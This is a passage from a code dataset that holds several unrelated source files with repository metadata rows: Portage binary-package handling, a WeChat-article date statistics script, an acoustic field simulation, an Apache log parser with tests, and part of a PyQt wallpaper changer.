new_filename = self.getname(cpv)
try:
samefile = os.path.samefile(filename, new_filename)
except OSError:
samefile = False
if not samefile:
self._ensure_dir(os.path.dirname(new_filename))
_movefile(filename, new_filename, mysettings=self.settings)
if self._all_directory and \
self.getname(cpv).split(os.path.sep)[-2] == "All":
self._create_symlink(cpv)
created_symlink = True
pkgindex = self._load_pkgindex()
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
# Discard remote metadata to ensure that _pkgindex_entry
# gets the local metadata. This also updates state for future
# isremote calls.
if self._remotepkgs is not None:
self._remotepkgs.pop(cpv, None)
# Discard cached metadata to ensure that _pkgindex_entry
# doesn't return stale metadata.
self.dbapi._aux_cache.pop(cpv, None)
try:
d = self._pkgindex_entry(cpv)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(cpv), noiselevel=-1)
self.dbapi.cpv_remove(cpv)
del self._pkg_paths[cpv]
return
# If found, remove package(s) with duplicate path.
path = d.get("PATH", "")
for i in range(len(pkgindex.packages) - 1, -1, -1):
d2 = pkgindex.packages[i]
if path and path == d2.get("PATH"):
# Handle path collisions in $PKGDIR/All
# when CPV is not identical.
del pkgindex.packages[i]
elif cpv == d2.get("CPV"):
if path == d2.get("PATH", ""):
del pkgindex.packages[i]
elif created_symlink and not d2.get("PATH", ""):
# Delete entry for the package that was just
# overwritten by a symlink to this package.
del pkgindex.packages[i]
pkgindex.packages.append(d)
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
def _pkgindex_write(self, pkgindex):
contents = codecs.getwriter(_encodings['repo.content'])(io.BytesIO())
pkgindex.write(contents)
contents = contents.getvalue()
atime = mtime = long(pkgindex.header["TIMESTAMP"])
output_files = [(atomic_ofstream(self._pkgindex_file, mode="wb"),
self._pkgindex_file, None)]
if "compress-index" in self.settings.features:
gz_fname = self._pkgindex_file + ".gz"
fileobj = atomic_ofstream(gz_fname, mode="wb")
output_files.append((GzipFile(filename='', mode="wb",
fileobj=fileobj, mtime=mtime), gz_fname, fileobj))
for f, fname, f_close in output_files:
f.write(contents)
f.close()
if f_close is not None:
f_close.close()
# some seconds might have elapsed since TIMESTAMP
os.utime(fname, (atime, mtime))
def _pkgindex_entry(self, cpv):
"""
Performs checksums and evaluates USE flag conditionals.
Raises InvalidDependString if necessary.
@rtype: dict
@return: a dict containing entry for the give cpv.
"""
pkg_path = self.getname(cpv)
d = dict(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(cpv, self._pkgindex_aux_keys)))
d.update(perform_multiple_checksums(
pkg_path, hashes=self._pkgindex_hashes))
d["CPV"] = cpv
st = os.stat(pkg_path)
d["MTIME"] = str(st[stat.ST_MTIME])
d["SIZE"] = str(st.st_size)
rel_path = self._pkg_paths[cpv]
# record location if it's non-default
if rel_path != cpv + ".tbz2":
d["PATH"] = rel_path
self._eval_use_flags(cpv, d)
return d
def _new_pkgindex(self):
return portage.getbinpkg.PackageIndex(
allowed_pkg_keys=self._pkgindex_allowed_pkg_keys,
default_header_data=self._pkgindex_default_header_data,
default_pkg_data=self._pkgindex_default_pkg_data,
inherited_keys=self._pkgindex_inherited_keys,
translated_keys=self._pkgindex_translated_keys)
def _update_pkgindex_header(self, header):
portdir = normalize_path(os.path.realpath(self.settings["PORTDIR"]))
profiles_base = os.path.join(portdir, "profiles") + os.path.sep
if self.settings.profile_path:
profile_path = normalize_path(
os.path.realpath(self.settings.profile_path))
if profile_path.startswith(profiles_base):
profile_path = profile_path[len(profiles_base):]
header["PROFILE"] = profile_path
header["VERSION"] = str(self._pkgindex_version)
base_uri = self.settings.get("PORTAGE_BINHOST_HEADER_URI")
if base_uri:
header["URI"] = base_uri
else:
header.pop("URI", None)
for k in self._pkgindex_header_keys:
v = self.settings.get(k, None)
if v:
header[k] = v
else:
header.pop(k, None)
def _pkgindex_version_supported(self, pkgindex):
version = pkgindex.header.get("VERSION")
if version:
try:
if int(version) <= self._pkgindex_version:
return True
except ValueError:
pass
return False
def _eval_use_flags(self, cpv, metadata):
use = frozenset(metadata["USE"].split())
raw_use = use
iuse = set(f.lstrip("-+") for f in metadata["IUSE"].split())
use = [f for f in use if f in iuse]
use.sort()
metadata["USE"] = " ".join(use)
for k in self._pkgindex_use_evaluated_keys:
if k.endswith('DEPEND'):
token_class = Atom
else:
token_class = None
try:
deps = metadata[k]
deps = use_reduce(deps, uselist=raw_use, token_class=token_class)
deps = paren_enclose(deps)
except portage.exception.InvalidDependString as e:
writemsg("%s: %s\n" % (k, str(e)),
noiselevel=-1)
raise
metadata[k] = deps
def exists_specific(self, cpv):
if not self.populated:
self.populate()
return self.dbapi.match(
dep_expand("="+cpv, mydb=self.dbapi, settings=self.settings))
def dep_bestmatch(self, mydep):
"compatibility method -- all matches, not just visible ones"
if not self.populated:
self.populate()
writemsg("\n\n", 1)
writemsg("mydep: %s\n" % mydep, 1)
mydep = dep_expand(mydep, mydb=self.dbapi, settings=self.settings)
writemsg("mydep: %s\n" % mydep, 1)
mykey = dep_getkey(mydep)
writemsg("mykey: %s\n" % mykey, 1)
mymatch = best(match_from_list(mydep,self.dbapi.cp_list(mykey)))
writemsg("mymatch: %s\n" % mymatch, 1)
if mymatch is None:
return ""
return mymatch
def getname(self, pkgname):
"""Returns a file location for this package. The default location is
${PKGDIR}/All/${PF}.tbz2, but will be ${PKGDIR}/${CATEGORY}/${PF}.tbz2
in the rare event of a collision. The prevent_collision() method can
be called to ensure that ${PKGDIR}/All/${PF}.tbz2 is available for a
specific cpv."""
if not self.populated:
self.populate()
mycpv = pkgname
mypath = self._pkg_paths.get(mycpv, None)
if mypath:
return os.path.join(self.pkgdir, mypath)
mycat, mypkg = catsplit(mycpv)
if self._all_directory:
mypath = os.path.join("All", mypkg + ".tbz2")
if mypath in self._pkg_paths.values():
mypath = os.path.join(mycat, mypkg + ".tbz2")
else:
mypath = os.path.join(mycat, mypkg + ".tbz2")
self._pkg_paths[mycpv] = mypath # cache for future lookups
return os.path.join(self.pkgdir, mypath)
def isremote(self, pkgname):
"""Returns true if the package is kept remotely and it has not been
downloaded (or it is only partially downloaded)."""
if self._remotepkgs is None or pkgname not in self._remotepkgs:
return False
# Presence in self._remotepkgs implies that it's remote. When a
# package is downloaded, state is updated by self.inject().
return True
def get_pkgindex_uri(self, pkgname):
"""Returns the URI to the Packages file for a given package."""
return self._pkgindex_uri.get(pkgname)
def gettbz2(self, pkgname):
"""Fetches the package from a remote site, if necessary. Attempts to
resume if the file appears to be partially downloaded."""
tbz2_path = self.getname(pkgname)
tbz2name = os.path.basename(tbz2_path)
resume = False
if os.path.exists(tbz2_path):
if tbz2name[:-5] not in self.invalids:
return
else:
resume = True
writemsg(_("Resuming download of this tbz2, but it is possible that it is corrupt.\n"),
noiselevel=-1)
mydest = os.path.dirname(self.getname(pkgname))
self._ensure_dir(mydest)
# urljoin doesn't work correctly with unrecognized protocols like sftp
if self._remote_has_index:
rel_url = self._remotepkgs[pkgname].get("PATH")
if not rel_url:
rel_url = pkgname+".tbz2"
remote_base_uri = self._remotepkgs[pkgname]["BASE_URI"]
url = remote_base_uri.rstrip("/") + "/" + rel_url.lstrip("/")
else:
url = self.settings["PORTAGE_BINHOST"].rstrip("/") + "/" + tbz2name
protocol = urlparse(url)[0]
fcmd_prefix = "FETCHCOMMAND"
if resume:
fcmd_prefix = "RESUMECOMMAND"
fcmd = self.settings.get(fcmd_prefix + "_" + protocol.upper())
if not fcmd:
fcmd = self.settings.get(fcmd_prefix)
success = portage.getbinpkg.file_get(url, mydest, fcmd=fcmd)
if not success:
try:
os.unlink(self.getname(pkgname))
except OSError:
pass
raise portage.exception.FileNotFound(mydest)
self.inject(pkgname)
def _load_pkgindex(self):
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(self._pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
except EnvironmentError:
pass
else:
try:
pkgindex.read(f)
finally:
f.close()
return pkgindex
def digestCheck(self, pkg):
"""
Verify digests for the given package and raise DigestException
if verification fails.
@rtype: bool
@return: True if digests could be located, False otherwise.
"""
cpv = pkg
if not isinstance(cpv, basestring):
cpv = pkg.cpv
pkg = None
pkg_path = self.getname(cpv)
metadata = None
if self._remotepkgs is None or cpv not in self._remotepkgs:
for d in self._load_pkgindex().packages:
if d["CPV"] == cpv:
metadata = d
break
else:
metadata = self._remotepkgs[cpv]
if metadata is None:
return False
digests = {}
for k in hashfunc_map:
v = metadata.get(k)
if not v:
continue
digests[k] = v
if "SIZE" in metadata:
try:
digests["size"] = int(metadata["SIZE"])
except ValueError:
writemsg(_("!!! Malformed SIZE attribute in remote " \
"metadata for '%s'\n") % cpv)
if not digests:
return False
hash_filter = _hash_filter(
self.settings.get("PORTAGE_CHECKSUM_FILTER", ""))
if not hash_filter.transparent:
digests = _apply_hash_filter(digests, hash_filter)
eout = EOutput()
eout.quiet = self.settings.get("PORTAGE_QUIET") == "1"
ok, st = _check_distfile(pkg_path, digests, eout, show_errors=0)
if not ok:
ok, reason = verify_all(pkg_path, digests)
if not ok:
raise portage.exception.DigestException(
(pkg_path,) + tuple(reason))
return True
def getslot(self, mycatpkg):
"Get a slot for a catpkg; assume it exists."
myslot = ""
try:
myslot = self.dbapi._pkg_str(mycatpkg, None).slot
except KeyError:
pass
return myslot
| gpl-2.0 | -7,462,835,677,793,273,000 | 30.585795 | 91 | 0.652544 | false | 2.932363 | false | false | false |
hhj0325/pystock | com/hhj/sogou/countByTime.py | 1 | 1082 | """
选取发布时间为2018年的文章,并对其进行月份统计
"""
import numpy as np
import pandas as pd
from pyecharts import Bar
df = pd.read_csv('sg_articles.csv', header=None, names=["title", "article", "name", "date"])
list1 = []
list2 = []
for j in df['date']:
# 获取文章发布年份及月份
time_1 = j.split('-')[0]
time_2 = j.split('-')[1]
list1.append(time_1)
list2.append(time_2)
df['year'] = list1
df['month'] = list2
# 选取发布时间为2018年的文章,并对其进行月份统计
df = df.loc[df['year'] == '2018']
month_message = df.groupby(['month'])
month_com = month_message['month'].agg(['count'])
month_com.reset_index(inplace=True)
month_com_last = month_com.sort_index()
attr = ["{}".format(str(i) + '月') for i in range(1, 12)]
v1 = np.array(month_com_last['count'])
v1 = ["{}".format(int(i)) for i in v1]
bar = Bar("微信文章发布时间分布", title_pos='center', title_top='18', width=800, height=400)
bar.add("", attr, v1, is_stack=True, is_label_show=True)
bar.render("微信文章发布时间分布.html") | apache-2.0 | 4,181,870,580,663,964,700 | 27.333333 | 92 | 0.641328 | false | 2.162037 | false | false | false |
szarvas/anc-field | examples/ie224-impulse.py | 1 | 5152 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal, stats
import sys
sys.path.append('..')
from anc_field_py.ancfield import *
from anc_field_py.ancutil import *
def add_microphones(ancObject):
# error_mic
ancObject.AddMic([4,1.6,5.3])
# reference_front
ancObject.AddMic([4,1.6,4.5])
# reference_back
ancObject.AddMic([4,1.6,6.5])
# reference_left
ancObject.AddMic([3,1.6,5.5])
# reference_right
ancObject.AddMic([5,1.6,5.5])
# reference_bottom
ancObject.AddMic([4,0.6,5.5])
# reference_top
ancObject.AddMic([4,2.6,5.5])
return ancObject
# =========================================================================
# SIMULATION 1
# Calculating noise to microphone paths
# =========================================================================
#
# Trying to run this simulation on CPU failed on an i7-3770, compiling the
# lrs_1.cl file fails. It maybe because the scene's size is too large for
# the CPU. Compiling it for the built in integrated GPU worked though.
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# noise_source
anc.AddSource([4,1.6,1.0], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_noise) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-noise-to-error.dat', y_noise[0,:])
np.savetxt('ie224-noise-to-reference_front.dat', y_noise[1,:])
np.savetxt('ie224-noise-to-reference_back.dat', y_noise[2,:])
np.savetxt('ie224-noise-to-reference_left.dat', y_noise[3,:])
np.savetxt('ie224-noise-to-reference_right.dat', y_noise[4,:])
np.savetxt('ie224-noise-to-reference_bottom.dat', y_noise[5,:])
np.savetxt('ie224-noise-to-reference_top.dat', y_noise[6,:])
# =========================================================================
# SIMULATION 2
# Calculating actuator to microphone paths
# =========================================================================
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# actuator
anc.AddSource([4,1.6,5.5], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_actuator) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-actuator-to-error.dat', y_actuator[0,:])
np.savetxt('ie224-actuator-to-reference_front.dat', y_actuator[1,:])
np.savetxt('ie224-actuator-to-reference_back.dat', y_actuator[2,:])
np.savetxt('ie224-actuator-to-reference_left.dat', y_actuator[3,:])
np.savetxt('ie224-actuator-to-reference_right.dat', y_actuator[4,:])
np.savetxt('ie224-actuator-to-reference_bottom.dat', y_actuator[5,:])
np.savetxt('ie224-actuator-to-reference_top.dat', y_actuator[6,:])
# =========================================================================
# GENERATING IMAGES FOR THE REPORT
# Calculating actuator to microphone paths
# =========================================================================
#
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_noise[0,:])
plt.title('ie224-noise-to-error')
fig.savefig('ie224-noise-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_noise[1,:])
plt.title('ie224-noise-to-reference_front')
fig.savefig('ie224-noise-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_noise[2,:])
plt.title('ie224-noise-to-reference_back')
fig.savefig('ie224-noise-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_noise[3,:])
plt.title('ie224-noise-to-reference_left')
fig.savefig('ie224-noise-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_noise[4,:])
plt.title('ie224-noise-to-reference_right')
fig.savefig('ie224-noise-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_noise[5,:])
plt.title('ie224-noise-to-reference_bottom')
fig.savefig('ie224-noise-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_noise[6,:])
plt.title('ie224-noise-to-reference_top')
fig.savefig('ie224-noise-to-reference_top.png')
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_actuator[0,:])
plt.title('ie224-actuator-to-error')
fig.savefig('ie224-actuator-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[1,:])
plt.title('ie224-actuator-to-reference_front')
fig.savefig('ie224-actuator-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[2,:])
plt.title('ie224-actuator-to-reference_back')
fig.savefig('ie224-actuator-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[3,:])
plt.title('ie224-actuator-to-reference_left')
fig.savefig('ie224-actuator-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[4,:])
plt.title('ie224-actuator-to-reference_right')
fig.savefig('ie224-actuator-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[5,:])
plt.title('ie224-actuator-to-reference_bottom')
fig.savefig('ie224-actuator-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[6,:])
plt.title('ie224-actuator-to-reference_top')
fig.savefig('ie224-actuator-to-reference_top.png')
| gpl-3.0 | -1,775,381,104,183,834,000 | 28.44 | 75 | 0.646545 | false | 2.813763 | false | false | false |
minersoft/httpd_logs | apache_log.py | 1 | 13255 | #
# Copyright Michael Groys, 2014
#
from ncsa_log import NCSALogFormat, NCSALogRecord, FieldNotDefinedException
from m.utilities import mergeDictionaries
import re
class ApacheLogFormat(NCSALogFormat):
idpattern = r"\>?[a-zA-Z]|\{[-\w]+\}[ieoC]"
# continue field numbering after NCSA basic fields
START_FIELD = NCSALogFormat.NUM_FIELDS
FLD_REMOTE_IP = START_FIELD
FLD_LOCAL_IP = START_FIELD+1
FLD_DURATION_USEC = START_FIELD+2
FLD_FILENAME = START_FIELD+3
FLD_KEEPALIVE_NUM = START_FIELD+4
FLD_PORT = START_FIELD+5
FLD_WORKER_PID = START_FIELD+6
FLD_QUERY_STRING = START_FIELD+7
FLD_HANDLER = START_FIELD+8
FLD_DURATION_SEC = START_FIELD+9
FLD_DEFINED_SERVER_NAME = START_FIELD+10
FLD_SERVER_NAME = START_FIELD+11
FLD_CONNECTION_STATUS = START_FIELD+12
FLD_RECEIVED_BYTES = START_FIELD+13
FLD_SENT_BYTES = START_FIELD+14
FLD_USER_AGENT = START_FIELD+15
FLD_REFERER = START_FIELD+16
FLD_CONTENT_TYPE = START_FIELD+17
FLD_CONTENT_LENGTH = START_FIELD+18
NUM_FIELDS = START_FIELD+19
ourFieldReferences = {
"a": [("remoteIp", FLD_REMOTE_IP)],
"A": [("localIp", FLD_LOCAL_IP)],
"B": [("bytesZero", NCSALogFormat.FLD_NUMBYTES)],
"D": [("durationUsec", FLD_DURATION_USEC)],
"f": [("filename", FLD_FILENAME)],
"H": [("protocol", NCSALogFormat.FLD_PROTOCOL)],
"k": [("keepaliveNum", FLD_KEEPALIVE_NUM)],
"m": [("method", NCSALogFormat.FLD_METHOD)],
"p": [("port", FLD_PORT)],
"P": [("workerPid", FLD_WORKER_PID)],
"q": [("queryString", NCSALogFormat.FLD_QUERY_STRING)],
"R": [("handler", FLD_HANDLER)],
"T": [("durationSec", FLD_DURATION_SEC)],
"U": [("urlPath", NCSALogFormat.FLD_URL_PATH)],
"v": [("definedServerName", FLD_DEFINED_SERVER_NAME)],
"V": [("serverName", FLD_SERVER_NAME)],
"X": [("connectionStatus", FLD_CONNECTION_STATUS)],
"I": [("receivedBytes", FLD_RECEIVED_BYTES)],
"O": [("sentBytes", FLD_SENT_BYTES)],
"{User-agent}i":[("_User_agent_i", FLD_USER_AGENT)],
"{Referer}i": [("_Referer_i", FLD_REFERER)],
"{Content-type}o": [("_Content_type_o", FLD_CONTENT_TYPE)],
"{Content-length}o": [("_Content_length_o", FLD_CONTENT_LENGTH)],
}
fieldReferences = mergeDictionaries(NCSALogFormat.fieldReferences, ourFieldReferences)
ourFieldPatterns = {
"a": r"(?P<remoteIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"A": r"(?P<localIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"B": r"(?P<bytesZero>\d+)",
"D": r"(?P<durationUsec>\d+)",
"f": r"(?P<filename>[^\s]+)",
"H": r"(?P<protocol>[\w/.]+)",
"k": r"(?P<keepaliveNum>\d+)",
"m": r"(?P<method>[A-Z]+)",
"p": r"(?P<port>\d+)",
"P": r"(?P<workerPid>\d+)",
"q": r"(?P<queryString>\?[^\s]+|)",
"R": r"(?P<handler>[^\s]+)",
"T": r"(?P<durationSec>\d+)",
"U": r"(?P<urlPath>[^\s?]+)",
"v": r"(?P<definedServerName>[^\s]+)",
"V": r"(?P<serverName>[^\s]+)",
"X": r"(?P<connectionStatus>[-X+])",
"I": r"(?P<receivedBytes>\d+)",
"O": r"(?P<sentBytes>\d+)",
"{User-agent}i": r"(?P<_User_agent_i>[^\"]*)",
"{Referer}i": r"(?P<_Referer_i>[^\s]+|-)",
"{Content-type}o": r"(?P<_Content_type_o>[^\"]+|-)",
"{Content-length}o": r"(?P<_Content_length_o>\d+|-)",
}
fieldPatterns = mergeDictionaries(NCSALogFormat.fieldPatterns, ourFieldPatterns)
# exceptional fields have both direct access and access via corresponding container
exceptionalFields = set(["{User-agent}i", "{Referer}i", "{Content-type}o", "{Content-length}o"])
predefinedFormats = {
"common": "%h %l %u %t \"%r\" %>s %b",
"vcommon": "%v %h %l %u %t \"%r\" %>s %b",
"extended": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
"combined": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
}
def __init__(self, formatStr):
self.inputHdrFields = {}
self.outputHdrFields = {}
self.envFields = {}
self.cookieFields = {}
resolved = ApacheLogFormat.predefinedFormats.get(formatStr)
if resolved:
formatStr = resolved
NCSALogFormat.__init__(self, formatStr)
fieldSubRE = re.compile("[-{}]")
def getCollectionFieldGroupName(self, field):
return ApacheLogFormat.fieldSubRE.sub("_", field)
def getPattern(self, field, default):
if field.startswith("{"):
if field in self.__class__.exceptionalFields:
pattern = NCSALogFormat.getPattern(self, field, default)
elif len(field)>3 and (field[-2:] in ["}i", "}o", "}e", "}c"]):
groupName =self.getCollectionFieldGroupName(field)
pattern = r"(?P<%s>.*)" % groupName
else:
pattern = default
else:
pattern = NCSALogFormat.getPattern(self, field, default)
return pattern
def registerFieldReferences(self, field):
NCSALogFormat.registerFieldReferences(self, field)
if len(field)>3:
if field[-2:] == "}i":
self.addReference(self.getCollectionFieldGroupName(field), self.inputHdrFields, field[1:-2])
elif field[-2:] == "}o":
self.addReference(self.getCollectionFieldGroupName(field), self.outputHdrFields, field[1:-2])
elif field[-2:] == "}e":
self.addReference(self.getCollectionFieldGroupName(field), self.envHdrFields, field[1:-2])
elif field[-2:] == "}C":
self.addReference(self.getCollectionFieldGroupName(field), self.cookieHdrFields, field[1:-2])
def getInputHdrField(self, fieldName, matchObj):
groupId = self.inputHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasInputHdrField(self,fieldName):
return fieldName in self.inputHdrFields
def getOutputHdrField(self, fieldName, matchObj):
groupId = self.outputHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasOutputHdrField(self,fieldName):
return fieldName in self.outputHdrFields
def getEnvHdrField(self, fieldName, matchObj):
groupId = self.envHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasEnvHdrField(self,fieldName):
return fieldName in self.envHdrFields
def getCookieHdrField(self, fieldName, matchObj):
groupId = self.cookieHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasCookieHdrField(self,fieldName):
return fieldName in self.cookieHdrFields
class ApacheLogRecord(NCSALogRecord):
def __init__(self, format, line, match=None):
NCSALogRecord.__init__(self, format, line, match)
def inputHdrField(self, fieldName):
return self._format.getInputHdrField(fieldName, self._match)
def outputHdrField(self, fieldName):
return self._format.getOutputHdrField(fieldName, self._match)
def envHdrField(self, fieldName):
return self._format.getEnvHdrField(fieldName, self._match)
def cookieHdrField(self, fieldName):
return self._format.getCookieHdrField(fieldName, self._match)
@property
def remoteIp(self):
return self._format.getField(ApacheLogFormat.FLD_REMOTE_IP, self._match)
@property
def localIp(self):
return self._format.getField(ApacheLogFormat.FLD_LOCAL_IP, self._match)
@property
def durationUsecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_USEC, self._match)
@property
def durationUsec(self):
val = self.durationUsecAsStr
return 0 if val=="-" else int(val)
@property
def durationSecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_SEC, self._match)
@property
def durationSec(self):
val = self.durationSecAsStr
return 0 if val=="-" else int(val)
@property
def duration(self):
if self._format.hasField(ApacheLogFormat.FLD_DURATION_USEC):
return self.durationUsec/1000000.
return float(self.durationSec)
@property
def filename(self):
return self._format.getField(ApacheLogFormat.FLD_FILENAME, self._match)
@property
def keepaliveNumAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_KEEPALIVE_NUM, self._match)
@property
def keepaliveNum(self):
val = self.keepaliveNumAsStr
return 0 if val=="-" else int(val)
@property
def portAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_PORT, self._match)
@property
def port(self):
val = self.portAsStr
return 0 if val=="-" else int(val)
@property
def workerPidAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_WORKER_PID, self._match)
@property
def workerPid(self):
val = self.workerPidAsStr
return 0 if val=="-" else int(val)
@property
def handler(self):
return self._format.getField(ApacheLogFormat.FLD_HANDLER, self._match)
@property
def definedServerName(self):
return self._format.getField(ApacheLogFormat.FLD_DEFINED_SERVER_NAME, self._match)
@property
def serverName(self):
return self._format.getField(ApacheLogFormat.FLD_SERVER_NAME, self._match)
@property
def connectionStatus(self):
return self._format.getField(ApacheLogFormat.FLD_CONNECTION_STATUS, self._match)
@property
def receivedBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_RECEIVED_BYTES, self._match)
@property
def receivedBytes(self):
val = self.receivedBytesAsStr
return 0 if val=="-" else int(val)
@property
def sentBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_SENT_BYTES, self._match)
@property
def sentBytes(self):
val = self.sentBytesAsStr
return 0 if val=="-" else int(val)
@property
def userAgent(self):
return self._format.getField(ApacheLogFormat.FLD_USER_AGENT, self._match)
@property
def referer(self):
return self._format.getField(ApacheLogFormat.FLD_REFERER, self._match)
@property
def contentType(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_TYPE, self._match)
@property
def contentLengthAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_LENGTH, self._match)
@property
def contentLength(self):
val = self.contentLengthAsStr
return -1 if val=="-" else int(val)
def getTestApacheRecord():
alf = ApacheLogFormat(formatStr = "extended")
line = '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"'
return ApacheLogRecord(alf, line)
def getTestCustomApacheRecord():
alf = ApacheLogFormat(formatStr = "%t %Dusec %h \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" \"%{Content-type}o\" %{Content-length}o")
line = '[30/Oct/2014:23:28:19 +0200] 134usec 127.0.0.1 "GET http://www.host.com/path?query HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" "text/html; charset=ISO-8859-4" 1000'
return ApacheLogRecord(alf, line)
def test():
import m.ut_utils as ut
ut.START_TEST("apache_log_basic")
record = getTestApacheRecord()
ut.EXPECT_EQ("", "record.queryString")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.referer")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.userAgent")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.inputHdrField('Referer')")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.inputHdrField('User-agent')")
ut.EXPECT_EQ("127.0.0.1", "record.remoteHost")
ut.END_TEST()
ut.START_TEST("apache_log_custom")
record = getTestCustomApacheRecord()
ut.EXPECT_EQ("?query", "record.queryString")
ut.EXPECT_EQ("/path", "record.urlPath")
ut.EXPECT_EQ("http://www.host.com", "record.urlRoot")
ut.EXPECT_EQ("-", "record.referer")
ut.EXPECT_EQ(134e-6, "record.duration")
ut.EXPECT_EQ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0", "record.userAgent")
ut.EXPECT_EQ("text/html; charset=ISO-8859-4", "record.contentType")
ut.EXPECT_EQ(1000, "record.contentLength")
ut.END_TEST() | bsd-3-clause | -8,697,373,372,509,737,000 | 38.335312 | 229 | 0.608751 | false | 3.312094 | true | false | false |
globalpolicy/pyWall | main.py | 1 | 6745 | # Author : globalpolicy
# Date : March 2-4, 2017
# Script : pyWall
# Description : Change windows wallpaper
# Python : 3.5
# Blog : c0dew0rth.blogspot.com
import requests
from bs4 import BeautifulSoup
import random
import shutil # for copying raw image data(a file-like object) to an actual image file
import ctypes # for calling Win32 API, specifically, SystemParametersInfo, to set wallpaper
import base64 # for turning original imagename into filesystem safe name
import tempfile # for obtaining temp directory
import os # for deleting file
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QTextEdit, QCheckBox, \
QSystemTrayIcon # for GUI
from PyQt5.QtGui import QFont, QIcon
import sys # for sys.exit(app.exec_())
import threading # for multithreading obviously
import time # for timing utilities
class QTGui(QWidget):
def __init__(self):
super().__init__()
self.showWindow()
def changeEvent(self, QEvent):
if QEvent.type() == QEvent.WindowStateChange:
if self.isMinimized():
print("minimized")
self.minimizetotray()
super().changeEvent(QEvent)
def showWindow(self):
self.setGeometry(300, 300, 300, 63)
self.setFixedSize(self.size())
self.setWindowIcon(QIcon("icon.png"))
self.setWindowTitle("pyWall UI")
global btn
btn = QPushButton("Change", self)
btn.resize(75, 23)
btn.move(0, self.height() - btn.height())
btn.setToolTip("Change the wallpaper right now.")
btn.clicked.connect(newWallpaperInNewThread)
global txtinterval
txtinterval = QTextEdit("100", self)
txtinterval.setToolTip("Time interval in seconds between wallpaper changes.")
txtinterval.resize(70, 23)
txtinterval.move(0, btn.y() - txtinterval.height())
global chkbox
chkbox = QCheckBox("Timer", self)
chkbox.setToolTip("Use timer for auto wallpaper change.")
chkbox.resize(49, 17)
chkbox.move(0, txtinterval.y() - chkbox.height())
chkbox.stateChanged.connect(checkBoxStateChanged)
global label
label = QLabel("", self)
label.setFont(QFont("Times", 8, QFont.Bold))
label.move(btn.width() + 5, 0)
label.resize(self.width()-btn.width(),self.height())
label.setWordWrap(True)
self.show()
def minimizetotray(self):
self.hide()
self.tray = QSystemTrayIcon()
self.tray.setIcon(QIcon("icon.png"))
self.tray.setToolTip("pyWall Tray")
self.tray.show()
self.tray.showMessage("pyWall", "pyWall will run in background.", msecs=500)
self.tray.activated.connect(self.trayiconactivated)
def trayiconactivated(self, reason):
if reason == QSystemTrayIcon.Trigger:
self.tray.hide()
self.show()
def checkBoxStateChanged(self):
timerStatus = chkbox.checkState() # chkbox.checkState() returns the "after-changed" status
